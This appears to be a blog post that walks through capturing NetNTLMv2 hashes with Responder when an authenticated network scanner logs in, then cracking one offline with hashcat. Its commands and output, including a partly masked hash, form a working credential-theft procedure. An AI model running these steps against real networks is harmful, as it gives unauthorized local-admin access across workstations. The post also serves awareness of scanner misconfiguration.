Cracking NTLM2 with Hashcat (Authenticated Scan)

Hi …

I have done small research but basically it is something that has been long time ago known but I just want to write it as a thoughts.

As you know that most of the company will do regular scan to their network to assess their assets

Many of scanner available in the market such as Lan Sweeper, Nessus and Etc. This scanner basically has capability to do authenticated scan to gather detailed information from the host it scans. For windows usually scanner will use domain user which become local admin to each workstation.

This network scanner is usually configured to scan by subnet such as so that everytime there is new machine attached to network will get scanned. It is good but this configuration can be used as an opportunity by the adversaries or insiders that has access to your network to gain control.

The attack vector is simple. Adversaries will attach their host to the network and run the responder to windows samba login

root@netdragon:~# responder -I wlan0
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|

           NBT-NS, LLMNR & MDNS Responder

  Author: Laurent Gaffie (
  To kill this script hit CTRL-C

The adversaries will only wait his machine to get scanned. When the scanner tries to authenticate then Hash will be sent to the machine like below

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : Test\admin-local
[SMB] NTLMv2-SSP Hash     : admin-local::Test:56d4c27f***c9e4f:10137BD6CFB5EC63EB***03802C7B5F2:010100000000000******150DE09D201************266A391000000000200080053004D004200330001001E0057004************0052004800340039003200520051004100460056000400140053004D00420033002E0******F00630061006C000******0570049004E002D005000520***00340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D0042003300************00630061006C0007000800C065315************00400020000000800300030000000000000000000000000200000D5C56AABC939A6E1EF7577************22A0663666387FDFB51FA0A007030A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E00******002E003400000000000000000000000000

Some of the hash has been masked 🙂

Then you can actually copy this hash to text file and crack it offline using hashcat.

copy this hash to file. You should copy the original one from responder without star


Now you can use hashcat and Password wordlist to crack it

root@netdragon:~/box/cbq# hashcat -m 5600 hash rockyou.txt 
hashcat (v5.1.0) starting...

* Device #1: This hardware has outdated CUDA compute capability (3.5).
             For modern OpenCL performance, upgrade to hardware that supports
             CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
nvmlDeviceGetCurrPcieLinkWidth(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetFanSpeed(): Not Supported

nvmlDeviceGetClockInfo(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetTemperatureThreshold(): Not Supported

nvmlDeviceGetUtilizationRates(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
* Device #1: GeForce 920M, 501/2004 MB allocatable, 2MCU

OpenCL Platform #2: The pocl project
* Device #2: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=305 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=5600 -D _unroll'
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344393
* Bytes.....: 139921522
* Keyspace..: 14344386
* Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: admin-local::test:56d4c27f***c9e4f:10137BD6CFB5E...000000
Time.Started.....: Wed Feb 12 00:11:01 2020 (0 secs)
Time.Estimated...: Wed Feb 12 00:11:01 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1786.3 kH/s (8.29ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 32768/14344386 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 0/14344386 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> elenutza
Hardware.Mon.#1..: Temp: 48c

Started: Wed Feb 12 00:10:56 2020
Stopped: Wed Feb 12 00:11:03 2020

Tadaa just a few seconds of cracking this.

So now the adversaries is having the username and password that has local admin priviledge to your entire workstation.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s